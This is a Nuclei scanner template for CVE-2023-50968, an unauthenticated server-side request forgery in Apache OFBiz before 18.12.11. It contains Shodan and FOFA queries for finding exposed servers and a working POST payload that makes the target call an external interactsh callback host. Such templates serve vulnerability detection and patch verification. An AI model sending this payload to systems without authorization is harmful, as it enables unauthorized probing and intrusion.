id: CVE-2023-50968 info: name: Apache OFBiz < 18.12.11 - Server Side Request Forgery author: your3cho severity: high description: | Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue. reference: - https://lists.apache.org/thread/x5now4bk3llwf3k58kl96qvtjyxwp43q - http://www.openwall.com/lists/oss-security/2023/12/26/2 - https://nvd.nist.gov/vuln/detail/CVE-2023-50968 - https://issues.apache.org/jira/browse/OFBIZ-12875 - https://ofbiz.apache.org/download.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-50968 cwe-id: CWE-918,CWE-200 epss-score: 0.23447 epss-percentile: 0.96556 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: apache product: ofbiz shodan-query: - html:"OFBiz" - http.html:"ofbiz" - ofbiz.visitor= fofa-query: - app="Apache_OFBiz" - body="ofbiz" - app="apache_ofbiz" tags: cve,cve2023,apache,ofbiz,ssrf variables: str: "{{rand_base(6)}}" http: - raw: - | POST /partymgr/control/{{path}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded {{parameter}}={"http://{{interactsh-url}}/api":"{{str}}"} payloads: path: - getJSONuiLabel - getJSONuiLabelArray parameter: - requiredLabel - requiredLabels attack: clusterbomb stop-at-first-match: true matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: header words: - 'OFBiz.Visitor=' # digest: 4a0a00473045022100a7c632b2971df4f69ad28132c54b26a3d0b8a8e45c8442612da9072e45190ceb022032552a4f03e7a272c0b0ef83cfe0e8c6cb5517eb9c443aab72ab8689070c8158:922c64590222798bb761d5b6d8e72950